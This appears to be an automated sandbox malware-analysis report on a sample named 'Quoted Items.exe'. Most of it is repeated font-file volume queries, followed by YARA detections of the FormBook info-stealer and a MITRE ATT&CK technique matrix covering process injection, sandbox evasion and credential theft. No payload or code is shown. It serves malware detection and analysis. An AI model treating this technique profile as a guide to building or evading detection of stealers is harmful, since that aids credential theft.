Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Quoted Items.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 4.0.Quoted Items.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.Quoted Items.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.Quoted Items.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.Quoted Items.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Quoted Items.exe.41791d0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.Quoted Items.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.Quoted Items.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.Quoted Items.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Quoted Items.exe.402a8a0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.515431699.0000000003370000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.350947066.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.514085622.0000000000DB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.316596581.000000000D158000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.351326281.0000000000C10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.278783725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.338397807.000000000D158000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.277402200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.287722353.000000000402A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.351362471.0000000000C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.515850944.0000000004D70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 4.0.Quoted Items.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.Quoted Items.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.Quoted Items.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.Quoted Items.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Quoted Items.exe.41791d0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.Quoted Items.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.Quoted Items.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.Quoted Items.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Quoted Items.exe.402a8a0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.515431699.0000000003370000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.350947066.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.514085622.0000000000DB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.316596581.000000000D158000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.351326281.0000000000C10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.278783725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.338397807.000000000D158000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.277402200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.287722353.000000000402A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.351362471.0000000000C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.515850944.0000000004D70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Shared Modules	Path Interception	612 Process Injection	1 Masquerading	OS Credential Dumping	221 Security Software Discovery	Remote Services	11 Archive Collected Data	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Disable or Modify Tools	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	1 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	31 Virtualization/Sandbox Evasion	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	2 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	612 Process Injection	NTDS	1 Remote System Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	12 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	11 Deobfuscate/Decode Files or Information	LSA Secrets	112 System Information Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	4 Obfuscated Files or Information	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	13 Software Packing	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	1 File Deletion	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

